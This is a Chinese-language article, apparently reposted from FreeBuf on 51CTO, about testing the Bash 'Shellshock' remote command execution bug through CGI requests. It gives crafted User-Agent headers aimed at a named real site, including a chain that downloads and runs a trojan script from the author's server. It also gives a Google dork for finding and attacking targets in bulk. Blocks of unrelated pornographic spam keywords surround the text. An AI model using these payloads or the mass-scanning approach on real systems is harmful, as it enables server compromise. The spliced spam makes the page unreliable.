国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Bash遠程解析命令執行漏洞測試方法

安全 漏洞
Bash漏洞與“心臟出血”漏洞不同,“心臟出血”只能借助竊取用戶電腦信息,而bash 漏洞允許黑客遠程控制電腦,拿到系統最高權限!其方法利用就更簡單了——復制/粘貼一行命令代碼即可!

從昨天開始,這個從澳大利亞遠渡重洋而來的BASH遠程命令執行漏洞就沸騰了整個FreeBuf,大家都在談論,“互聯網的心臟又出血了”,可是,親,到底怎么對網站進行測試?下面這段腳本

$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神們說的這樣嗎?

它與“心臟出血”漏洞不同,“心臟出血”只能借助竊取用戶電腦信息,而bash 漏洞允許黑客遠程控制電腦,拿到系統最高權限!其方法利用就更簡單了——復制/粘貼一行命令代碼即可!

Bash漏洞為什么能夠執行

Bash漏洞的原理:

BASH除了可以將shell變量導出為環境變量,還可以將shell函數導出為環境變量!當前版本的bash通過以函數名作為環境變量名,以“(){”開頭的字串作為環境變量的值來將函數定義導出為環境變量。

此次爆出的漏洞在于BASH處理這樣的“函數環境變量”的時候,并沒有以函數結尾“}”為結束,而是一直執行其后的shell命令。

簡單地說就是,Bash腳本在解析某些特殊字符串時出現邏輯錯誤導致可以執行后面的命令。

Bash漏洞與遠程執行有啥聯系

看到上面的解釋,很多童鞋都理解成了本地的漏洞,然后很多人又覺得,本地有啥可以利用的,于是就忽略了這個神級漏洞的存在。我想說的是,這個漏洞,利用熱度可以媲美當年的MS08-067,威力雖然弱了點,但遠程控制電腦還是可以的。

首先解釋一下cgi腳本。很多網站類似下面的鏈接:

GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后臺不僅僅用python、Perl來解釋執行并反饋給客戶端Response,當然還可以換做bash腳本來解釋執行提交上來的GET/POST請求。所以,理論上,你在HTTP請求中插入一個Bash命令,比如

() { :;}; wget http://www.myvps.org/testvul.sh

如果服務器的Bash解釋器具有這個漏洞,那么在解釋上面這這句話的時候就會執行wget請求,將一個惡意的testvul.sh文件下載到這個服務器,那為何說要放在HTTP頭部呢?比如:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

這是因為這個漏洞是bash解釋器在解釋某些特殊的變量時才可以觸發的:

在于BASH處理以“(){”開頭的“函數環境變量”的時候,并沒有以函數結尾“}”為結束,而是一直執行其后的shell命令

通過自定義這些參數的值為“函數環境變量”的形式,就可以觸發后面的命令,惡意的客戶僅需要發送特殊構造的HTTP請求就可以使服務器執行特定的命令(命令的權限和解釋HTTP請求的Bash腳本環境相同)。

實際測試中,我的構造的測試請求:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

過程是這樣的:

我發送GET請求–>目標服務器cgi路徑

目標服務器解析這個get請求,碰到UserAgent后面的參數,Bash解釋器就執行了后面的命令

目標服務器wget–>我的myvps.org

我的vps記錄下這個訪問的IP地址

然后查看我的myvps.org服務器的訪問記錄,就可以確定目標有沒有去訪問,如果訪問了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget請求訪問的日志:

Bash遠程解析命令執行漏洞測試方法 

#p#

 

大神是這樣測試漏洞的

當然,你也可以這樣構造:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

實際上執行了下面三句:

/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你會發現,你的木馬就這么腳本了,這就是Bash漏洞利用的精髓。

當然,你可以利用批量Google搜索:

filetype:cgi inurl:cgi-bin site:jp

然后批量提交類似的GET請求,你就能做到批量測試了。測試表明,500個url里有6-8個有bash漏洞

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2010-09-13 17:57:12

執行漏洞

2010-09-17 16:01:55

代碼執行漏洞EXE文件

2022-05-07 11:31:25

漏洞網絡攻擊

2013-12-20 10:20:34

2021-01-26 10:00:45

漏洞網絡安全網絡攻擊

2016-11-08 19:56:09

GitLab漏洞遠程命令

2015-03-06 15:31:01

2016-09-29 14:37:39

ImageMagick漏洞分析

2023-12-14 16:20:09

2017-08-22 13:45:27

2011-08-04 13:53:04

2019-05-15 15:20:01

微軟漏洞防護

2020-10-08 13:44:27

漏洞

2014-09-25 19:30:51

2014-09-12 17:47:36

2014-08-27 16:22:19

2015-04-30 08:11:40

2017-06-15 17:28:36

2012-09-20 10:08:17

PowerShell

2014-10-29 15:44:55

點贊
收藏

51CTO技術棧公眾號

国产在线精品视频| 91精品国产免费久久久久久| 国产成人免费精品| 国产成人免费av| 老牛嫩草一区二区三区日本| 五月婷婷之综合激情| 欧美日韩高清影院| 精品欧美午夜寂寞影院| 亚洲7777| 午夜免费久久看| 国内自拍亚洲| 欧美精品一区在线| 亚洲一区在线观看免费| 日韩成人一区| 亚洲综合欧美日韩| 欧美伊人久久大香线蕉综合69| 一区二区三区视频免费视频观看网站 | 狠狠色狠狠色综合日日五| 久久精品国产精品亚洲毛片| 精品乱子伦一区二区三区| 亚洲欧美日韩国产手机在线| 日韩三区在线| 欧美日韩精品久久| 色嗨嗨av一区二区三区| 国产成人三级| 日韩av播放器| 一区二区三区国产在线观看| 亚洲乱码久久| 亚洲大胆精品| 国产成人精品久久亚洲高清不卡| 91亚洲资源网| 亚洲淫成人影院| 亚洲精品中字| 日韩视频免费观看高清完整版在线观看 | 亚洲欧美国产不卡| 亚洲视频一二区| 亚洲欧美综合另类在线卡通| 亚洲免费中文| a√中文在线观看| 77777少妇光屁股久久一区| 成人一区在线观看| 国产丝袜在线播放| 欧美大陆一区二区| 欧美日韩在线精品一区二区三区激情| 久久国产精品亚洲人一区二区三区| 播九公社成人综合网站| 色综合久久88| 久久久精品国产99久久精品芒果| 99久久精品一区二区成人| 水蜜桃一区二区| 日韩免费在线观看| 日韩电影在线一区| 国产啊啊啊视频在线观看| 手机在线观看国产精品| 亚洲国产另类久久精品| 精品一区二区三区在线播放| 成人免费一区二区三区牛牛| 亚洲国产另类久久久精品极度| 日韩欧美另类在线| 欧美a级理论片| 黑人巨大精品| 国产三区在线视频| 久久久久久91| 亚洲一二三四在线| 亚洲激情中文| 热99在线视频| 91麻豆国产福利精品| 亚洲国产一区二区久久| 久久一级电影| 欧美日韩一区二区三区| 一级特黄性色生活片| 亚洲精品动漫100p| 国产一区欧美一区| 亚州一区二区三区| 91午夜在线观看| 宅男66日本亚洲欧美视频| 国产大片一区二区| 日韩制服一区| 日批视频在线免费看| 国模视频一区二区| 国产蜜臀av在线一区二区三区| 99精品在免费线中文字幕网站一区| 成人eeuss影院在线观看| 国产ts人妖一区二区三区 | 日本免费在线观看| 日韩欧美亚洲日产国产| 亚洲精品国产福利| www.日本不卡| 国产成人精品三级高清久久91| 日本h片在线看| 久久国产主播精品| 亚洲欧美一区二区三区在线| 国产农村妇女毛片精品久久麻豆 | 99久久婷婷这里只有精品| 在线观看a视频| 中文精品一区二区三区| 欧美精品在线网站| 无码av免费一区二区三区试看 | 欧美一级免费| 天堂中文av| 欧美日本亚洲| 欧美理论电影在线播放| 狠狠色狠色综合曰曰| 精品在线免费观看| xx欧美撒尿嘘撒尿xx| 视频一区二区三区国产 | 182在线视频观看| 黄色av免费在线播放| 国产精品欧美一区二区三区奶水| 欧美午夜激情在线| 精品一区二区三区久久| 日本妇女一区| 爱福利在线视频| 久久99国产精品久久99果冻传媒| 91日韩在线| 亚洲精品日韩久久| 日韩一级精品| 美女爽到呻吟久久久久| 亚洲激情文学| 亚洲成人二区| 中文字幕av资源一区| 欧美性videos高清精品| 亚洲欧美怡红院| 国产欧美日韩在线视频| 蜜桃视频一区二区| 久久久噜噜噜久久狠狠50岁| 欧美日韩亚洲国产精品| 少妇精品久久久一区二区三区| 四虎地址8848精品| 成人黄色图片网站| 欧美wwwwww| 欧美午夜一区| 蜜臀精品久久久久久蜜臀| 国产成人一区在线| 尤物在线观看一区| 综合久久久久久| 任你躁在线精品免费| 岛国成人毛片| 国产三级视频| 国产精品av免费| 国产精品久久久久久久av大片| 亚洲人成亚洲人成在线观看| 日韩欧美主播在线| 国产片一区二区三区| 久久se这里有精品| 欧美精品日韩| 秋霞综合在线视频| av成人免费| 女同视频在线观看| 在线播放你懂的| 日本xxxxxxx免费视频| 一区二区三区四区不卡| 成人区精品一区二区| 欧美在线视频免费观看| 在线日韩欧美视频| 日韩午夜精品电影| 欧美日韩午夜视频在线观看| 亚洲国产精品精华液ab| 成人小视频在线| 日韩电影一二三区| 欧美精品色网| 日韩片欧美片| 日韩在线你懂的| 狂野欧美xxxx韩国少妇| 91九色国产在线播放| 91网页在线观看| 国产污污在线观看| 可以免费看污视频的网站| 欧美三级一级片| 九一免费在线观看| 图片区小说区区亚洲五月| 婷婷六月综合网| 97在线视频免费看| 四虎国产精品永远| 日韩午夜在线播放| 国产激情在线视频| 亚洲成人a级网| caoporn视频在线观看| 亚洲国产成人久久综合| 欧美videos另类精品| 色菇凉天天综合网| 另类图片亚洲色图| 欧美成人69av| 九九热精品视频在线播放| www.日本在线视频| 天天做天天爱天天综合网| 亚洲人成在线观| 免费毛片aaaaaa| 国产美女视频一区| 2023亚洲男人天堂| 日本网站在线免费观看视频| 欧美一级片在线播放| h片免费观看| 韩国精品一区二区| 日韩在线视频国产| 黄色大片在线免费观看| 亚洲欧美日韩系列| 激情伊人五月天| 91在线视频在线| 欧美一级视频免费看|